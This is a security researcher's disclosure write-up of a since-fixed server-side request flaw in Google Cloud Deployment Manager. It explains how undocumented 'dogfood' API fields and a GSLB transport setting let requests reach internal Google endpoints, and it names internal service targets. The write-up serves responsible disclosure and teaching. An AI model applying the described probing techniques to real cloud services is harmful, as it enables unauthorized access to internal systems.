RCE in Google Cloud Deployment Manager

TL;DR

By using an internal test (dogfood) version of Google Cloud Deployment Manager, I was able to issue some requests to some Google internal endpoints (Through GSLB), which could have led to RCE.

This could be achieved through an request to the Deployment Manager with this format, which begins an async operation.
The operation attempts to send a GET request to the specified endpoint's descriptor URL, and expects a descriptor document as an answer.
If it fails, it might still provide internal information in the error message, if it succeeds, it would allow more complex internal requests to be issued.

Examples: App Engine Admin API (Internal test version), Issue Tracker Corp API.
Note the issue is not limited to requests to APIs, it just works best on them; example of non-API endpoint (Google Accounts and ID Administration "GAIA" backend - Test endpoint) - The descriptorUrl doesn't matter there, since it is not an API.

Google paid $31,337.00 as a reward for the bug report.

Intro

Google Cloud is full of exciting computing services, such as Compute Engine, Dataflow, and BigQuery, and among those services you can find the Cloud Deployment Manager.
Deployment Manager is a Google Cloud service that provides a way to handle resources' creation, deletion, and modification, through a given API.
This is done through Deployments, which define one or more Resources, each of a given Type. These Deployments can specify Python and Jinja2 templates to programmatically set some options.

There are several predefined Types, and in the Deployment Manager API v2beta version, Google added Type Providers, which allow users to create their own custom Types by providing a descriptor document.


And, whenever something is mutated (created, modified, or deleted) through the Deployment Manager API, an Operation is returned, which can be polled to check for completion or error.

Note
It is a bit hard to understand Google Cloud Deployment Manager at first glance, if you are interested in it, I would recommend you play around with it, specially through the v2beta REST API. Read the docs and try creating Deployments and Type Providers to get the feel of it.
I tried to link useful resources throughout this write-up, hoping they will make it easier to understand.

Security research

My first approach to researching the Deployment Manager was to look for hidden/internal Types, since some Google services (Such as Google App Engine Flexible) use the Deployment Manager internally (You can see it in your project's logs when deploying an app), but I found none.

Then, I looked at the Jinja2 and Python templates of the Deployments.
Through some trial and error, I was able to create Deployments, with specially crafted templates, that would return data as a Python exception on their Operations.

This way, I was able to inspect the Python libraries, read the Python code, and list/read files, but the templates' interpreting script runs on an isolated container with zero privileges, not even network connectivity.

After those attempts, I tried creating Type Providers pointing to internal Google Corp APIs, such as issuetracker.corp.googleapis.com, but the Operations always failed with an error saying it did not receive a valid JSON response, and showing the HTML for the login page to which issuetracker.corp.googleapis.com redirects to (When accessed externally).
And specifying any private IP address failed with an error saying it was not a valid address (Attempts to bypass it, with domains and redirections pointing to private IPs, gave the same result).

These failed attempts were quite demotivating, so I did not continue researching the Deployment Manager for a while (Remember I did not do all this research all at once on a single day, it was a very slow process).


One day, I decided to look into the Deployment Manager API methods, by enabling it on the Cloud Console, going to the metrics page, and looking at the Filters section, where there is a drop-down list titled Methods with all of them, including undocumented ones - Methods usually include the API version in their names.


I noticed there were two more API versions besides v2 and v2beta (The documented ones), called alpha and dogfood.
And I could call methods on those versions, just by replacing v2 or v2beta with either alpha or dogfood in every API call.

I played around a bit with the alpha version, but I did not find anything interesting in it.

The dogfood version was a bit more interesting though, specially because I have noticed the word dogfood being used for internal testing in Google services.

When I listed the Types on that version, most of them returned an extra field: googleOptions.
When I listed my own Type Providers, they also included this extra field, and specifying the $outputDefaults system parameter in my query, I could see the googleOptions field had the following fields inside (Along with the values I found at first glance and their effect if I specified them when creating a Type Provider of my own):

  • injectProject
    Boolean, I could not figure out what it does, the API always sets it to false on my Type Providers, regardless of the value I specified.
  • deleteIntent
    Enum, the only valid value I found was CREATE_OR_ACQUIRE, I am not sure what its effect might be.
  • isLocalProvider
    Boolean, I am not sure what it might be for, but whenever I set it to true, the Type Provider was successfully created, but creating Deployments that used it always failed with an error saying the descriptor document could not be retrieved.
  • ownershipKind
    Enum, the possible values were UNKNOWN, USER and GOOGLE. I did not notice any effects by setting it to different values, but I always set it to GOOGLE just in case.
  • transport
    Enum, the possible values were UNKNOWN_TRANSPORT_TYPE and HARPOON. I did not notice any special effects with those values.
  • credentialType
    Enum, the possible values were UNKNOWN_CREDENTIAL_TYPE and OAUTH. I did not notice any special effects with those values.
  • gslbTarget
    String, either empty or something like blade:<TARGET> or gslb:<TARGET>
    .
  • descriptorUrlServerSpec
    String, either the same as gslbTarget or empty.
A couple examples of how this looked like

This was very promising, GSLB is Google's Global Service Load Balancer and when provided a symbolic name, it will direct traffic to a linked BNS address (Borg Naming Service), according to the SRE Book.

It surely looks like this could be used as SSRF to internal servers!

I had noticed blade:<TARGET> and gslb:<TARGET> before, while researching other services on Google Cloud, so I tried them on gslbTarget and descriptorUrlServerSpec, but they did not seem to have any effect.

I then tried to brute force the possible credentialType values, and found a new one: GAIAMINT (I had seen that name referenced before, for example, in this Google Git commit)

When testing Deployments with a Type Provider using that value, I noticed that a fake API I had set, instead of receiving an access token in the
Authorization header (The usual behavior), the header was now set to something like: EndUserCreds 1 <URL-safe Base64 data> (Example).

I am not sure how to decode that, but it looks like it has some protobuf data inside some other binary format, and some strings can be retrieved: anonymous, 331656524293@cloudservices.gserviceaccount.com (The email of the service account Deployment Manager uses for tokens on my project), cloud-dm and cloudgaia::vjgv73:9898.
This looks like it is intended for internal use, and some googlers confirmed it is intended for authentication between internal Google systems, it should not be possible to use it externally.

Besides this, I was unable to brute force any other valid values for credentialType, nor any value for transport.

At this point I also tried adding staging_ to the beginning of the API version, since I noticed the Google Compute Engine API does that for the Staging environment (Fact mentioned in a few places, like in this GitHub PR), and it worked!
But the Staging environment seemed to work exactly the same way as the Production one.

After several failed attempts to achieve anything significant, I stopped researching Deployment Manager for a couple weeks.
During that break, I took part in a cool research on Google Cloud SQL with Wouter, where an SRE greeted us! (Write-up pending, issue hasn't been fixed just yet)

The same week the Cloud SQL report was submitted, I got the idea of using Proto over HTTP to find out the missing values of the credentialType and transport Enums, since in protobuf, Enums are represented as numbers, not Strings.

Proto over HTTP is an experimental gRPC fallback feature in some Google APIs, not very well documented, availability varies per API, and different APIs might implement it a bit differently.
When I tried it on the Deployment Manager API, I found out:

  • URLs stay the same (/deploymentmanager/<VERSION>/projects/<PROJECT>/global/...)
  • The Content-Type header needs to be set to application/x-protobuf
  • In Production, it fails with the message: Proto over HTTP is not allowed for service
  • It works in Staging!

After some meddling with it, I reverse engineered the proto definition by creating Type Providers with different values through Proto over HTTP,
decoding raw protobuf answers with protoc --decode_raw, and looking for the new values in the normal JSON API.
Through this, I got a good enough approximation, and found these new values for the Enums:
  • transport 
    • GSLB - Under certain circumstances it makes the create Type Provider operation fail with 503 Service Unavailable
  • credentialType 
    • ENDUSERCREDS, TYPE_CREDENTIAL - They seem to act the same way as OAUTH and UNKNOWN_CREDENTIAL_TYPE 
    • UNKNOWN_CT_5 - I never found out the real name for this one, the API always returned an empty protobuf answer when I set the Enum to this value, the create Type Provider Operation was never even started
After a bit more meddling with these, I found out that setting transport to GSLB was the key to issuing internal requests!

The bug

With the newly discovered GSLB value for transport, I can craft Type Providers such that the Deployment Manager issues requests to internal Google endpoints... As long as I know where to point gslbTarget to.

Here is an example for creating a Type Provider for Google App Engine Admin API - Test environment (Which since my 2018 GAE RCE, has been blocked externally by a 429 error).

I got blade:apphosting-admin by listing Types on the dogfood version, the appengine.v1.version Type had gslbTarget set to this value.
I added -nightly at the end because, before the GAE Test API got blocked externally in 2018, I had noticed the string nightly a lot in it.

This Type Provider worked flawlessly, and I successfully created a Deployment that used it to launch a new app into GAE Test to check if my 2018 bug had been fixed properly (It was).

If I specified some invalid gslbTarget (And I always set descriptorUrlServerSpec to the same value as gslbTarget), the Operation for creating a Type Provider would fail, either with an error message saying it could not connect to the GSLB endpoint, the error the endpoint threw (Sometimes it returned some error like 404), or that the response was not JSON (For example, some endpoints returned HTML) along with the response data.
One endpoint even returned an error page with a Java stack trace and a message along the lines of: Debugging information, only visible to internal IPs!
Therefore, I could retrieve some internal information this way.

If I specified some valid gslbTarget, like blade:corp-issuetracker-api for issuetracker.corp.googleapis.com (I got the GSLB name from some of my past research), I would be able to perform calls to the API!
Even though I had no idea how the format for Issue Tracker's resources would be like, this could be easily overcome by calling listTypes on the new Type Provider.

These were interesting issues, but I was a bit doubtful of their impact, specially since requests were being made with the Deployment Manager service account's credentials for my project, which would probably be restricted to which endpoints it would be allowed to talk to.

While researching this, I had told some googlers that I had found a way to perform requests to GSLB endpoints, and they told me to write it down on a VRP grant ticket, so the SRE team could have a heads up to what I was up to, in case they detected my requests.

They also explained one potential issue with requests to GSLB endpoints:

If service A makes a request with service B on behalf of user C, the authorization of user C is checked. If there are no credentials for C, then the authorization of A is checked instead.

This was really interesting, since I had noticed that the service account credentials used by Deployment Manager were delegated by cloud-dm-staging@prod.google.com (I could see the delegator's ID in the Cloud Console logs), and I assume it means it has, at least, permissions to delegate tokens for some service accounts.

I would just have to find a way to do so, and remove the service account's credentials so the identity of the Deployment Manager would be used instead.

By this time, it was night in Uruguay, so I just wrote down my research in the grant ticket and stopped researching for the day.


Next morning, my dogs woke me up at about 6 AM, and I noticed notifications of updates on the grant ticket, including one that arrived just as I was reading them:

Eduardo then quickly submitted a VRP report for me, triaged it, escalated it to P0 S0, and sent Nice catch!.
It took less than 5 minutes from report submission to Nice catch!, maybe the fastest RCE VRP report ever :).

Later that day, I asked Eduardo a few questions, and he told me this bug was now being treated as an incident, but it just seems that RCE bugs are usually treated like so.
Because of this, they asked me to stop further research into it, and send them the details of my actions and findings.

I asked about the potential way this issue could have been exploited, and my understanding is:

  • Privilege escalation may be achieved through the identity of the Deployment Manager service (cloud-dm-staging@prod.google.com), so it might have access to internal services a normal service account would not have access to
  • It is not known if there are attack vectors that would allow an attacker to achieve a shell into Google's internal systems, but the privileges could be high enough

Because of this probable maximum impact, Google treated this as RCE, and issued a $31,337.00 reward (Their current standard amount for RCE).



Thanks so much to the Google VRP!
It was a very interesting bug to research, and I would love to see what other issues could be found in Google Cloud Deployment Manager.


Extra notes

The issue has now been fixed. The fix seems to just be that now gslbTarget and descriptorUrlServerSpec are ignored when specified on a create, patch, or update Type Provider operation.
The dogfood version might still be accessible for a while on the API, but that does not mean it is a security issue by itself. There could be some hidden security hole in it though ;).

Also, after reporting my findings to Google, and even after finishing the first few drafts of this write-up, I had the idea of checking whether the Discovery Document for the dogfood version of the Staging Deployment Manager API could be accessed publicly.
Lo an behold, it can: https://staging-deploymentmanager.sandbox.googleapis.com/$discovery/rest?version=dogfood (Copy on GitHub, just in case it stops working in the future).

The Discovery Document includes the googleOptions field, and provides a little bit more insight into what its fields do, but not nearly enough, so even if I had noticed the document before, I would have probably had to perform the same steps I performed during my research.

Timeline

  • May 7th, 2020: Issue found and mentioned in a VRP grant ticket
  • May 8th, 2020: Googler checks the issue, submits RCE report and quickly escalates it
  • May 19th, 2020: Reward of $31,337.00 issued
  • May 20th, 2020: Issue confirmed as fixed

Comments

Post a Comment